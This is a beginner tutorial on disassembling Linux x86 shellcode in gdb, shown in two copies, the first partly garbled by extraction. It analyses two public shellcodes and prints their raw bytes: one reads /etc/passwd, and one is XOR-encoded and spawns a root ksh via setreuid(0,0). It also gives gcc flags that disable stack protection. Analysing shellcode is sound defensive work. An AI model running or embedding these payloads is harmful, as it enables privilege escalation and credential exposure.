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Linux x86 Reverse Engineering
Basic guide of Shellcode Disassembling

Harsh N. Daftary
Sr. Security Researcher at CSPF
Security Consultant at Trunkoz Technologies

Abstract:-Most of the Windows as well as Linux based programs contains bugs
or security holes and/or errors. These bugs or error in program can
be exploited in order to crash the program or make system do
unwanted stuff
Exploit usually attacks the program on Memory Corruption,
Segmentation Dump, format string, Buffer overflow or something
In computer security, a shellcode is a small piece of code used as
the payload in the exploitation of a software vulnerability. It is called
"shellcode" because it typically starts a command shell from which
the attacker can control the compromised machine.
It is just a basic guide, not for l33t reverse engineers :)

Introduction:Shellcode are not responsible for exploiting but to create a shell
or execute something on victim system after exploiting the bug.
Shellcode can execute almost all the functions that a
independent program could. Execution of this code takes place
after exploiting vulnerability.(usually)
Importance :
By just looking at shellcode we cannot say what it does, As
hackers often uses various shellcodes along with their
respective exploits
We just believe what description of shellcode says and are
ready to run it but, How can we trust it. It can do many other
functions apart from what its description say and it can end up
in compromising our own system, or create backdoor for
shellcode author
So the reverse Engineering Helps us to to get idea of working
of the code.

Basic idea about encryption and x86 structure is required.
General Registers :
32 bits : EAX EBX ECX EDX
16 bits : AX BX CX DX
8 bits : AH AL BH BL CH CL DH
Called the Accumulator register.
It is used for I/O port access, arithmetic, interrupt calls.
Segment Registers :
Segment registers hold the segment address of various items
Index and Pointers:
idexes and pointer and the offset part of and address. They
have various uses but each register has a specific function.
Test System Specification :
Linux Ubuntu 10.04
Intel i3
System Architecture: x86- 32 bit
NASM assembled shellcode
In this paper I would discuss Reverse Engineering of Two
1. Simple program that reades /etc/passwd file
2. XOR encrypted shellcode that launches new shell ksh with
setreuid (0,0)
so we create breakpoint at this pointer and run so at point
we hit our breakpoint that time we disassemble the
1. Simple program that reads
/etc/passwd file
Shellcode: ( Download Link given in the end )
Now we create a simple program that will execute this code
and Compile it using
gcc –fno-stack-protector -z execstack code.c –o shellcode
It will compile our code and program should work without any

Debugger Output:
0x0804a040 <+0>:
xor eax,eax
--- > It will xor eax with eax, it is used to make eax register 0
0x0804a042 <+2>:
0x0804a043 <+3>:

push edx

0x0804a044 <+4>:
push 0x7461632f
0x0804a049 <+9>:
push 0x7461632f
0x0804a04e <+14>:
mov ebx,esp
--- > Copies the data stored into esp into ebx

= tac/

0x0804a050 <+16>:
push edx
0x0804a051 <+17>:
push 0x64777373
0x0804a056 <+22>:
push 0x61702f2f
0x0804a05b <+27>:
push 0x6374652f
0x0804a060 <+32>:
mov ecx,esp
0x0804a062 <+34>:
mov al,0xb
--- > loads AL register with (0xb)hex
0x0804a064 <+36>:
push edx
0x0804a065 <+37>:
push ecx
0x0804a066 <+38>:
push ebx
0x0804a067 <+39>:
mov ecx,esp
--- > copy data stored in esp into ecx register

Lets load our Program into Debugger
Now we set the disassembling structure to intel.

0x0804a069 <+41>:
int 0x80
--- > Makes a syscall by interrupt 80
0x0804a06b <+43>:

add BYTE PTR [eax],al

So now we have to stop just before execution so we create
breakpoint at a place where program makes a syscall i.e. at
address: 0x0804a069
Interrupt 80 makes a syscall with syscall number stored in eax
as we can see by code:
print /x $eax
-->> $eax = 11
We need to find function that will start at syscall number 11
so under x86 structure we open :
/usr/src/your linux header/arch/x86/include/asm/unistd_32.h

Looking at our source code file we can find that the name of
pointer in which we stored our shellcode is "code"
2. XOR enecrypted shellcode thats launches new shell ksh
with setreuid (0,0)
Shellcode :

This file contains list of functions against their syscall numbers
So at 11th number we understand that program is calling

Now we create a simple prorgam that will execute this code
and Compile it using
gcc –fno-stackp-protector -z execstack code.c –o shellcode
Importance of this code it to compile our code without any

Manual of execve :

Now lets examine values stored in other 32 bit registers

Lets load our Program into Debugger
Looking at our source code file we can find that the name of
pointer in which we stored our shellcode is "code"
creating breakpoint and analyzing

ebx i.e. Second argument contains a hex number which
converted into string as /bin/cat
cat is Linux bash command used to read a file
3rd argument i.e. ecx register stores a location of file which
"/bin/cat" will read
so file is 0xbffff3d0:
Program will read /etc/passwd file and then will exit.

0x0804a047 <+7>:
0x0804a04a <+10>:
0x0804a04b <+11>:
0x0804a04d <+13>:


0x804a047 <code+7>
0x804a054 <code+20>
Here this lines of code will xor decrypt all the commands till
end with 0x7c and then will jump to 0x804a054
So now we create break point just after XOR decryption
finishes and before it jumps to another memory location for
further execution

Syscall Number is 70
And Arguments are 0,0
/usr/src/your linux header/arch/x86/include/asm/unistd_32.h

As we can compare disassembly output to the previous one,
we can understand all the instructions after 0x0804a04d are
now decrypted So basically XOR decryption is finished, Now
we look at EIP +27 we see that Interrupt 80 is being called for
syscall so we new create our new breakpoint there

Just as Before EAX register contains Syscall Number
EBX and ECX register contains Argument
Here again we Have Syscall Number 11 that is execve
function as we saw that last time.
And EBX register contains hex data which we convert into
string so we get /bin/ksh

So Here 1st argument sets uid and 2nd argument sets gid
Which in our case both are 0
Means the program here is trying to get the root access
over system.
Now lets create breakpoint where program calls interrupt
80 to make a syscall

So it means This shellcode is going to first decode it self,
then will try open another shell (KSH) located at /bin/ksh
with root access
If you find anything missing or have any suggestions feel
free to contact me :)
PS :
1. Data associated with PUSH can be directly analyzed by
converting hex into string, but that data/string will be Rightto-Left.
2. Location of unistd_32.h may be different. Using locate
function may be helpful in finding it.
This is just basic guide, Next paper will be in more detail.

Reference :
1. Vivek ramchandran.
2. J prassanna and Hiren Shah for providing
research platform.
Shellcodes :
1. http://www.shellstorm.org/shellcode/files/shellcode-809.php
2. http://www.shellstorm.org/shellcode/files/shellcode-571.php

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Linux Shellcode disassembling

  • 1. Linux x86 Reverse Engineering Basic guide of Shellcode Disassembling Harsh N. Daftary Sr. Security Researcher at CSPF Security Consultant at Trunkoz Technologies info@securityLabs.in Abstract:-Most of the Windows as well as Linux based programs contains bugs or security holes and/or errors. These bugs or error in program can be exploited in order to crash the program or make system do unwanted stuff Exploit usually attacks the program on Memory Corruption, Segmentation Dump, format string, Buffer overflow or something else. In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. It is just a basic guide, not for l33t reverse engineers :) Introduction:Shellcode are not responsible for exploiting but to create a shell or execute something on victim system after exploiting the bug. Shellcode can execute almost all the functions that a independent program could. Execution of this code takes place after exploiting vulnerability.(usually) Importance : By just looking at shellcode we cannot say what it does, As hackers often uses various shellcodes along with their respective exploits We just believe what description of shellcode says and are ready to run it but, How can we trust it. It can do many other functions apart from what its description say and it can end up in compromising our own system, or create backdoor for shellcode author So the reverse Engineering Helps us to to get idea of working of the code. Basic idea about encryption and x86 structure is required. General Registers : 32 bits : EAX EBX ECX EDX 16 bits : AX BX CX DX 8 bits : AH AL BH BL CH CL DH EAX,AX,AH,AL : Called the Accumulator register. It is used for I/O port access, arithmetic, interrupt calls. Segment Registers : CS DS ES FS GS SS Segment registers hold the segment address of various items Index and Pointers: ESI EDI EBP EIP ESP idexes and pointer and the offset part of and address. They have various uses but each register has a specific function. Test System Specification : Linux Ubuntu 10.04 Intel i3 System Architecture: x86- 32 bit NASM assembled shellcode In this paper I would discuss Reverse Engineering of Two programs. 1. Simple program that reades /etc/passwd file 2. XOR encrypted shellcode that launches new shell ksh with setreuid (0,0)
  • 2. so we create breakpoint at this pointer and run so at point we hit our breakpoint that time we disassemble the program 1. Simple program that reads /etc/passwd file Shellcode: ( Download Link given in the end ) "x31xc0x99x52x68x2fx63x61x74x68x2fx62x69x6e x89xe3x52x68x73x73x77x64x68x2fx2fx70x61x68x 2fx65x74x63x89xe1xb0x0bx52x51x53x89xe1xcdx8 0" Now we create a simple program that will execute this code and Compile it using gcc –fno-stack-protector -z execstack code.c –o shellcode It will compile our code and program should work without any hindrance. Debugger Output: 0x0804a040 <+0>: xor eax,eax --- > It will xor eax with eax, it is used to make eax register 0 0x0804a042 <+2>: 0x0804a043 <+3>: cdq push edx 0x0804a044 <+4>: push 0x7461632f 0x0804a049 <+9>: push 0x7461632f 0x0804a04e <+14>: mov ebx,esp --- > Copies the data stored into esp into ebx = tac/ 0x0804a050 <+16>: push edx 0x0804a051 <+17>: push 0x64777373 0x0804a056 <+22>: push 0x61702f2f 0x0804a05b <+27>: push 0x6374652f 0x0804a060 <+32>: mov ecx,esp 0x0804a062 <+34>: mov al,0xb --- > loads AL register with (0xb)hex 0x0804a064 <+36>: push edx 0x0804a065 <+37>: push ecx 0x0804a066 <+38>: push ebx 0x0804a067 <+39>: mov ecx,esp --- > copy data stored in esp into ecx register Lets load our Program into Debugger Now we set the disassembling structure to intel. 0x0804a069 <+41>: int 0x80 --- > Makes a syscall by interrupt 80 0x0804a06b <+43>: add BYTE PTR [eax],al So now we have to stop just before execution so we create breakpoint at a place where program makes a syscall i.e. at address: 0x0804a069 Interrupt 80 makes a syscall with syscall number stored in eax register, as we can see by code: print /x $eax -->> $eax = 11 We need to find function that will start at syscall number 11 so under x86 structure we open : /usr/src/your linux header/arch/x86/include/asm/unistd_32.h Looking at our source code file we can find that the name of pointer in which we stored our shellcode is "code"
  • 3. 2. XOR enecrypted shellcode thats launches new shell ksh with setreuid (0,0) Shellcode : "xebx0dx5ex31xc9xb1x21x80x36x7cx46xe2xfaxeb x05xe8xeexffxffxffx16x3ax24x4dxa7x4dxb5xb1xfc x4dxaex16x77x24x2ex14x53x17x0fx14x14x53x1ex 15x12xf5x9fx2ex2fxf5x9dxb1xfc" This file contains list of functions against their syscall numbers So at 11th number we understand that program is calling "execve" Now we create a simple prorgam that will execute this code and Compile it using gcc –fno-stackp-protector -z execstack code.c –o shellcode Importance of this code it to compile our code without any hindrance. Manual of execve : Now lets examine values stored in other 32 bit registers Lets load our Program into Debugger Looking at our source code file we can find that the name of pointer in which we stored our shellcode is "code" creating breakpoint and analyzing ebx i.e. Second argument contains a hex number which converted into string as /bin/cat cat is Linux bash command used to read a file 3rd argument i.e. ecx register stores a location of file which "/bin/cat" will read so file is 0xbffff3d0: "/etc//passwd" Program will read /etc/passwd file and then will exit. 0x0804a047 <+7>: 0x0804a04a <+10>: 0x0804a04b <+11>: 0x0804a04d <+13>: xorb inc loop jmp $0x7c,(%esi) %esi 0x804a047 <code+7> 0x804a054 <code+20>
  • 4. Here this lines of code will xor decrypt all the commands till end with 0x7c and then will jump to 0x804a054 So now we create break point just after XOR decryption finishes and before it jumps to another memory location for further execution Syscall Number is 70 And Arguments are 0,0 /usr/src/your linux header/arch/x86/include/asm/unistd_32.h As we can compare disassembly output to the previous one, we can understand all the instructions after 0x0804a04d are now decrypted So basically XOR decryption is finished, Now we look at EIP +27 we see that Interrupt 80 is being called for syscall so we new create our new breakpoint there Just as Before EAX register contains Syscall Number EBX and ECX register contains Argument
  • 5. Here again we Have Syscall Number 11 that is execve function as we saw that last time. And EBX register contains hex data which we convert into string so we get /bin/ksh So Here 1st argument sets uid and 2nd argument sets gid Which in our case both are 0 Means the program here is trying to get the root access over system. Now lets create breakpoint where program calls interrupt 80 to make a syscall So it means This shellcode is going to first decode it self, then will try open another shell (KSH) located at /bin/ksh with root access If you find anything missing or have any suggestions feel free to contact me :) ~Regards, Harsh info@securitylabs.in PS : 1. Data associated with PUSH can be directly analyzed by converting hex into string, but that data/string will be Rightto-Left. 2. Location of unistd_32.h may be different. Using locate function may be helpful in finding it. This is just basic guide, Next paper will be in more detail. Reference : 1. Vivek ramchandran. 2. J prassanna and Hiren Shah for providing research platform. Shellcodes : 1. http://www.shellstorm.org/shellcode/files/shellcode-809.php 2. http://www.shellstorm.org/shellcode/files/shellcode-571.php